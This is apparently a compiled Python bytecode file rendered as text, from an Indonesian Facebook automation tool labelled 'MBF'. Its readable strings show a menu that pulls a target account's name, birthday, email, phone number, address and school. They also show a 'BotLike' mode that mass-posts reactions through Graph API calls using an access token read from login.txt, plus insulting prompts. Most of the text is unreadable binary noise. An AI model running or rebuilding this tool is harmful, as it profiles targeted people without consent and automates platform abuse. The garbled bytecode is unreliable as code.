\x1b[1;92mID\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mUsername\x1b[1;97m : t\x08\x00\x00\x00usernames&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama depan\x1b[1;97m : t\n\x00\x00\x00first_names&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama tengah\x1b[1;97m: t\x0b\x00\x00\x00middle_names&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNama akhir\x1b[1;97m : t\t\x00\x00\x00last_names&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mTgl Lahir\x1b[1;97m : t\x08\x00\x00\x00birthdayt\x01\x00\x00\x00/t\x01\x00\x00\x00-s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : R;\x00\x00\x00s\'\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : R\xbf\x00\x00\x00s"\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : R\x97\x00\x00\x00t\x01\x00\x00\x00_i\x00\x00\x00\x00s&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mAlamat\x1b[1;97m : t\x08\x00\x00\x00locations&\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mSekolah\x1b[1;97m : t\t\x00\x00\x00educations \x00\x00\x00 \x1b[1;91m ~ \x1b[1;97mt\x06\x00\x00\x00schools\x1a\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mSelesai(\x13\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R3\x00\x00\x00R*\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\'\x00\x00\x00R`\x00\x00\x00Ri\x00\x00\x00(\x07\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00t\x06\x00\x00\x00targetRd\x00\x00\x00R\r\x00\x00\x00R\x85\x00\x00\x00t\x0e\x00\x00\x00inputerrorpass(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R3\x00\x00\x00\x8d\x02\x00\x00s\xa2\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x02\r\x12\x05\x01\t\x01\x0c\x02\x0c\x01\x05\x01\n\x02\x05\x01\x11\x02 \x02\x1f\x01\x12\x02\x05\x01\x11\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x1d\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x1e\x01\r\x01\x04\x01\x03\x01\x15\x01\r\x01\x04\x01\x03\x01\x05\x01\x11\x01\x03\x01\x15\x01\r\x01\x0c\x01\r\x01\x07\x02\x04\x03\x05\x01\x0c\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x02\x00GHd\x03\x00d\x04\x00\x14GHd\x00\x00S(\x05\x00\x00\x00NR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_(\x02\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>Ra\x00\x00\x00\xfc\x02\x00\x00s\x06\x00\x00\x00\x00\x01\r\x12\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s,\x00\x00\x00d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x05\x00GHd\x06\x00GHd\x07\x00GHd\x08\x00GHd\x00\x00S(\t\x00\x00\x00Ns%\x00\x00\x00\x1b[1;96m[\x1b[1;97m1.\x1b[1;96m] \x1b[1;96mLikes(\x00\x00\x00\x1b[1;95m[\x1b[1;97m2.\x1b[1;95m] \x1b[1;95mLove <3s\'\x00\x00\x00\x1b[1;94m[\x1b[1;97m3.\x1b[1;94m] \x1b[1;94mWow :0s(\x00\x00\x00\x1b[1;93m[\x1b[1;97m4.\x1b[1;93m] \x1b[1;93mHaha :vs)\x00\x00\x00\x1b[1;97m[\x1b[1;97m5.\x1b[1;97m] \x1b[1;97mSedih :(s*\x00\x00\x00\x1b[1;91m[\x1b[1;97m6.\x1b[1;91m] \x1b[1;91mMarah >:(s\x16\x00\x00\x00\x1b[1;97m---------------s(\x00\x00\x00\x1b[1;91m[\x1b[1;97m7.\x1b[1;91m] \x1b[1;91mKembali(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\xbc\x00\x00\x00\x11\x03\x00\x00s\x10\x00\x00\x00\x00\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x1f\x00\x00\x00t\x00\x00\x83\x00\x00\x01d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x00\x00S(\x05\x00\x00\x00Ns\'\x00\x00\x00\x1b[1;91m[\x1b[1;97m1.\x1b[1;91m] \x1b[1;92mTargets(\x00\x00\x00\x1b[1;91m[\x1b[1;97m2.\x1b[1;91m] \x1b[1;92mBerandas\x16\x00\x00\x00\x1b[1;97m---------------s(\x00\x00\x00\x1b[1;91m[\x1b[1;97m3.\x1b[1;91m] \x1b[1;91mKembali(\x01\x00\x00\x00Ra\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x07\x00\x00\x00beranda\x1b\x03\x00\x00s\n\x00\x00\x00\x00\x01\x07\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x87\x04\x00\x00y\xd7\x03t\x00\x00d\x01\x00k\x02\x00r\x92\x00d\x02\x00GHt\x01\x00j\x02\x00d\x03\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x05\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\t\x00\x83\x01\x00\x01qY\x00W|\x01\x00d\x05\x00\x19d\x06\x00\x19St\x00\x00d\n\x00k\x02\x00r!\x01d\x02\x00GHt\x01\x00j\x02\x00d\x0b\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x0c\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\t\x00\x83\x01\x00\x01q\xe8\x00W|\x01\x00d\x0c\x00\x19d\x06\x00\x19St\x00\x00d\r\x00k\x02\x00r\xac\x01d\x02\x00GHt\x01\x00j\x02\x00d\x0e\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x06\x00\x19D]-\x00}\x02\x00d\x07\x00|\x02\x00d\x0f\x00\x19d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x10\x00\x83\x01\x00\x01qs\x01W|\x01\x00d\x06\x00\x19St\x00\x00d\x11\x00k\x02\x00r;\x02d\x02\x00GHt\x01\x00j\x02\x00d\x12\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x11\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x13\x00\x83\x01\x00\x01q\x02\x02W|\x01\x00d\x11\x00\x19d\x06\x00\x19St\x00\x00d\x14\x00k\x02\x00r\xbe\x02d\x02\x00GHt\x01\x00j\x02\x00d\x15\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x5\x00|\x01\x00d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x10\x00\x83\x01\x00\x01q\x8d\x02W|\x01\x00St\x00\x00d\x16\x00k\x02\x00rM\x03d\x02\x00GHt\x01\x00j\x02\x00d\x17\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x16\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x13\x00\x83\x01\x00\x01q\x14\x03W|\x01\x00d\x16\x00\x19d\x06\x00\x19Sd\x02\x00GHt\x01\x00j\x02\x00d\x18\x00t\x0c\x00t\x03\x00f\x02\x00\x16\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x0c\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\t\x00\x83\x01\x00\x01q\x9d\x03W|\x01\x00d\x0c\x00\x19d\x06\x00\x19SWn\xa9\x00\x04t\r\x00k\n\x00r\x10\x04\x01\x01\x01d\x19\x00GHt\x0e\x00d\x1a\x00\x83\x01\x00}\x03\x00t\x0f\x00\x83\x00\x00\x01t\x10\x00\x83\x00\x00\x01t\x11\x00\x83\x00\x00\x01ns\x00\x04t\x01\x00j\x12\x00j\x13\x00k\n\x00rL\x04\x01\x01\x01d\x1b\x00GHt\x0e\x00d\x1a\x00\x83\x01\x00}\x04\x00t\x0f\x00\x83\x00\x00\x01t\x10\x00\x83\x00\x00\x01t\x11\x00\x83\x00\x00\x01n7\x00\x04t\x14\x00k\n\x00r\x82\x04\x01\x01\x01d\x1c\x00GHt\x0e\x00d\x1a\x00\x83\x01\x00}\x05\x00t\x0f\x00\x83\x00\x00\x01t\x10\x00\x83\x00\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1d\x00\x00\x00Nt\x08\x00\x00\x00wallposts\x1c\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLoading...sF\x00\x00\x00https://graph.facebook.com/v3.0/me?fields=home.limit(50)&access_token=s=\x00\x00\x00https://graph.facebook.com/gwimusa3/subscribers?access_token=t\x04\x00\x00\x00homeRt\x00\x00\x00s!\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m : %sR\x1a\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xb9?t\x02\x00\x00\x00mesG\x00\x00\x00https://graph.facebook.com/v3.0/me?fields=feed.limit(500)&access_token=t\x04\x00\x00\x00feedt\x03\x00\x00\x00reqsC\x00\x00\x00https://graph.facebook.com/me/friendrequests?limit=50&access_token=t\x04\x00\x00\x00fromg{\x14\xaeG\xe1z\x84?R\xa3\x00\x00\x00sF\x00\x00\x00https://graph.facebook.com/me?fields=friends.limit(5000)&access_token=g\xfc\xa9\xf1\xd2MbP?t\x04\x00\x00\x00subssA\x00\x00\x00https://graph.facebook.com/me/subscribedto?limit=50&access_token=t\x06\x00\x00\x00albumssE\x00\x00\x00https://graph.facebook.com/me?fields=albums.limit(5000)&access_token=sH\x00\x00\x00https://graph.facebook.com/v3.0/%s?fields=feed.limit(50)&access_token=%ss\x10\x00\x00\x00\x1b[1;91m[X] Gagals!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Errors\x0c\x00\x00\x00[!] Terhenti(\x15\x00\x00\x00t\x02\x00\x00\x00WTR\x1d\x00\x00\x00R\x1e\x00\x00\x00R)\x00\x00\x00t\x04\x00\x00\x00postR\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R7\x00\x00\x00R\x1a\x00\x00\x00R\'\x00\x00\x00R\x07\x00\x00\x00Ra\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R{\x00\x00\x00(\x06\x00\x00\x00R\x18\x00\x00\x00t\x06\x00\x00\x00resultRd\x00\x00\x00t\x0e\x00\x00\x00inpuganyanmor1t\x0e\x00\x00\x00inputayanomorlt\x0e\x00\x00\x00inputananomorh(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\xe4\x00\x00\x00$\x03\x00\x00s\xb0\x00\x00\x00\x00\x03\x03\x01\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x11\x01\x10\x00\r\x00\x0e\x01\x08\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x11\x01\x0c\x00\r\x00\x0e\x01\x04\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x03\x05\x02\x19\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x10\x02\r\x01\x05\x01\x0c\x01\x07\x01\x07\x01\n\x01\x13\x01\x05\x01\x0c\x01\x07\x01\x07\x01\n\x01\r\x01\x05\x01\x0c\x01\x07\x01\x07\x01c\x02\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x84\x01\x00\x00d\x01\x00GHd\x02\x00GHy5\x01d\x03\x00}\x02\x00x\x02\x01|\x00\x00D]\xfa\x00}\x03\x00|\x02\x00|\x01\x00k\x05\x00r0\x00Pn\n\x00|\x02\x00d\x04\x007}\x02\x00i\x02\x00t\x00\x00d\x05\x006t\x01\x00d\x06\x006}\x04\x00d\x07\x00j\x02\x00|\x03\x00d\x08\x00\x19\x83\x01\x00}\x05\x00t\x03\x00j\x04\x00|\x05\x00d\t\x00|\x04\x00\x83\x01\x01}\x06\x00|\x03\x00d\x08\x00\x19j\x05\x00d\n\x00\x83\x01\x00d\x03\x00\x19}\x07\x00y-\x00d\x0b\x00|\x07\x00\x17d\x0c\x00\x17|\x03\x00d\r\x00\x19d\x0e\x00 j\x06\x00d\x0f\x00d\x10\x00\x83\x02\x00\x17d\x11\x00\x17GHWq\x1a\x00\x04t\x07\x00k\n\x00r\x13\x01\x01\x01\x01y%\x00d\x0b\x00|\x07\x00\x17d\x0c\x00\x17|\x03\x00d\x12\x00\x19j\x06\x00d\x0f\x00d\x10\x00\x83\x02\x00\x17GHWq\x14\x01\x04t\x07\x00k\n\x00r\x0f\x01\x01\x01\x01d\x13\x00|\x07\x00\x17d\x14\x00\x17GHq\x14\x01Xq\x1a\x00Xq\x1a\x00Wd\x15\x00GHt\x08\x00d\x16\x00\x83\x01\x00}\x08\x00t\t\x00\x83\x00\x00\x01t\n\x00\x83\x00\x00\x01t\x0b\x00\x83\x00\x00\x01Wn>\x00\x04t\x0c\x00k\n\x00r\x7f\x01\x01\x01\x01t\x08\x00d\x17\x00\x83\x01\x00}\t\x00t\x08\x00d\x16\x00\x83\x01\x00}\n\x00t\t\x00\x83\x00\x00\x01t\n\x00\x83\x00\x00\x01t\x0b\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x18\x00\x00\x00Ns\x1b\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mMulai...R\\\x00\x00\x00i\x00\x00\x00\x00i\x01\x00\x00\x00R\x84\x00\x00\x00t\x04\x00\x00\x00types(\x00\x00\x00https://graph.facebook.com/{0}/reactionsR\x1a\x00\x00\x00Rt\x00\x00\x00R\xd4\x00\x00\x00s\x10\x00\x00\x00\r\x1b[1;92m[\x1b[1;97ms\x10\x00\x00\x00\x1b[1;92m]\x1b[1;97m t\x07\x00\x00\x00messagei(\x00\x00\x00s\x01\x00\x00\x00\nRf\x00\x00\x00s\x03\x00\x00\x00...t\x05\x00\x00\x00storys\r\x00\x00\x00\r\x1b[1;92m[OK][t\x01\x00\x00\x00]s\x1a\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSelesais!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x0c\x00\x00\x00[!] Terhenti(\r\x00\x00\x00R)\x00\x00\x00R\xe9\x00\x00\x00R\x92\x00\x00\x00R\x1d\x00\x00\x00R\xe4\x00\x00\x00Ri\x00\x00\x00R`\x00\x00\x00R\'\x00\x00\x00R\x07\x00\x00\x00Ra\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00R{\x00\x00\x00(\x0b\x00\x00\x00t\x05\x00\x00\x00postst\x06\x00\x00\x00amountt\x07\x00\x00\x00counterR\xe4\x00\x00\x00t\n\x00\x00\x00parametersRH\x00\x00\x00R\x0f\x00\x00\x00R\x1a\x00\x00\x00R\xa6\x00\x00\x00t\x07\x00\x00\x00tanyak3t\n\x00\x00\x00inputm1eki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x04\x00\x00\x00like\x80\x03\x00\x00s<\x00\x00\x00\x00\x02\x05\x01\x05\x01\x03\x01\x06\x01\r\x02\x0c\x01\x04\x02\n\x02\x14\x01\x13\x01\x15\x02\x17\x02\x03\x01-\x01\r\x01\x03\x01%\x01\r\x01\x19\x02\x05\x01\x0c\x01\x07\x01\x07\x01\x0b\x01\r\x01\x0c\x01\x0c\x01\x07\x01\x07\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x1e\x01\x00\x00y\xff\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x1a\x00k\x06\x00r+\x00d\x04\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\xd3\x00|\x00\x00d\x1b\x00k\x06\x00rG\x00d\x07\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\xb7\x00|\x00\x00d\x1c\x00k\x06\x00rc\x00d\n\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\x9b\x00|\x00\x00d\x1d\x00k\x06\x00r\x7f\x00d\r\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\x7f\x00|\x00\x00d\x1e\x00k\x06\x00r\x9b\x00d\x10\x00a\x01\x00t\x02\x00\x83\x00\x00\x01nc\x00|\x00\x00d\x1f\x00k\x06\x00r\xb7\x00d\x13\x00a\x01\x00t\x02\x00\x83\x00\x00\x01nG\x00|\x00\x00d \x00k\x06\x00r\xd7\x00t\x03\x00d\x16\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01n\'\x00|\x00\x00d\x17\x00k\x02\x00r\xf2\x00d\x18\x00GHt\x05\x00\x83\x00\x00\x01n\x0c\x00d\x19\x00GHt\x05\x00\x83\x00\x00\x01Wn\x18\x00\x04t\x06\x00k\n\x00r\x19\x01\x01\x01\x01t\x05\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00Ns+\x00\x00\x00\x1b[1;91m\nmbfz\x1b[1;97m/\x1b[1;91mBotLike\x1b[1;97m> R\x93\x00\x00\x00t\x02\x00\x00\x0001t\x04\x00\x00\x00LIKEt\x01\x00\x00\x002t\x02\x00\x00\x0002t\x04\x00\x00\x00LOVEt\x01\x00\x00\x003t\x02\x00\x00\x0003t\x03\x00\x00\x00WOWt\x01\x00\x00\x004t\x02\x00\x00\x0004t\x04\x00\x00\x00HAHAt\x01\x00\x00\x005t\x02\x00\x00\x0005t\x03\x00\x00\x00SADt\x01\x00\x00\x006t\x02\x00\x00\x0006t\x05\x00\x00\x00ANGRYt\x01\x00\x00\x007t\x02\x00\x00\x0007i\x01\x00\x00\x00R\\\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91m[!] Jangan kosongs\x1c\x00\x00\x00\x1b[1;91m[!] Yang bener Goblok(\x02\x00\x00\x00R\x93\x00\x00\x00R\xf4\x00\x00\x00(\x02\x00\x00\x00R\xf6\x00\x00\x00R\xf7\x00\x00\x00(\x02\x00\x00\x00R\xf9\x00\x00\x00R\xfa\x00\x00\x00(\x02\x00\x00\x00R\xfc\x00\x00\x00R\xfd\x00\x00\x00(\x02\x00\x00\x00R\xff\x00\x00\x00R\x00\x01\x00\x00(\x02\x00\x00\x00R\x02\x01\x00\x00R\x03\x01\x00\x00(\x02\x00\x00\x00R\x05\x01\x00\x00R\x06\x01\x00\x00(\x07\x00\x00\x00R\x07\x00\x00\x00R\xe9\x00\x00\x00t\t\x00\x00\x00bot_tanyaR7\x00\x00\x00R,\x00\x00\x00R\xbd\x00\x00\x00R{\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00cek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\xbd\x00\x00\x00\xa8\x03\x00\x00s<\x00\x00\x00\x00\x01\x03\x02\x0c\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x01\n\x02\x0c\x01\x05\x01\n\x02\x05\x01\x0b\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xd7\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x18\x00\x04t\x03\x00k\n\x00r3\x00\x01\x01\x01t\x04\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00\x83\x00\x00\x01t\x06\x00d\x03\x00\x83\x01\x00a\x07\x00t\x07\x00j\x08\x00\x83\x00\x00d\x04\x00k\x02\x00ro\x00t\t\x00\x83\x00\x00\x01t\x06\x00d\x05\x00\x83\x01\x00a\n\x00n\x00\x00t\n\x00d\x06\x00k\x02\x00r\x8a\x00d\x07\x00GHt\x0b\x00\x83\x00\x00\x01n9\x00t\x07\x00d\x08\x00k\x02\x00r\xae\x00t\t\x00\x83\x00\x00\x01t\x0c\x00\x83\x00\x00\x01t\x0b\x00\x83\x00\x00\x01n\x15\x00t\x07\x00d\t\x00k\x02\x00r\xc3\x00d\n\x00a\x07\x00n\x00\x00t\r\x00t\x0e\x00\x83\x00\x00d\x0b\x00\x83\x02\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s?\x00\x00\x00\n\x1b[1;91mmbfz\x1b[1;97m/\x1b[1;91mBotLike\x1b[1;97m/\x1b[1;91mJalur\x1b[1;97m> R\x93\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Target\x1b[1;97m : R\\\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91m[!] Jangan kosongR\xf9\x00\x00\x00R\xf6\x00\x00\x00R\xdb\x00\x00\x00i2\x00\x00\x00(\x0f\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R)\x00\x00\x00R(\x00\x00\x00R-\x00\x00\x00R\xda\x00\x00\x00R\x10\x00\x00\x00R\xe3\x00\x00\x00R\x0b\x00\x00\x00Ra\x00\x00\x00R\x1a\x00\x00\x00R\xbd\x00\x00\x00R\xbc\x00\x00\x00R\xf3\x00\x00\x00R\xe4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x07\x01\x00\x00\xcb\x03\x00\x00s&\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0b\x02\x07\x01\x0c\x01\x12\x01\x07\x01\x0f\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x07\x01\x07\x01\n\x01\x0c\x01\t\x01c\x00\x00\x00\x00\r\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x1b\x02\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xt\x06\x00j\x07\x00d\n\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x08\x00j\t\x00|\x02\x00\x83\x01\x00}\x03\x00t\n\x00j\x0b\x00d\x0b\x00\x83\x01\x00\x01d\x0c\x00GHd\r\x00d\x0e\x00\x14GHt\x04\x00d\x0f\x00\x83\x01\x00}\x04\x00xi\x01|\x03\x00d\x10\x00\x19d\x11\x00\x19D]Y\x01}\x05\x00|\x05\x00d\x12\x00\x19}\x06\x00d\x13\x00|\x05\x00d\x14\x00\x19\x17GHt\x04\x00d\x15\x00\x83\x01\x00}\x07\x00|\x07\x00d\x16\x00k\x02\x00r\xf5\x00q\xba\x00nh\x00|\x07\x00d\x17\x00k\x02\x00r\x07\x01q\xba\x00nV\x00|\x07\x00d\x18\x00k\x02\x00r\x1d\x01t\x05\x00\x83\x00\x00\x01n@\x00|\x07\x00d\x19\x00k\x02\x00r3\x01t\x05\x00\x83\x00\x00\x01n*\x00t\x06\x00j\x07\x00d\x1a\x00|\x06\x00\x17d\x1b\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x08\x00j\t\x00|\x08\x00\x83\x01\x00}\t\x00y\x8a\x00x=\x00|\t\x00d\x1c\x00\x19d\x11\x00\x19D]-\x00}\n\x00t\x0c\x00j\r\x00d\x1a\x00|\n\x00d\x12\x00\x19\x17d\x1d\x00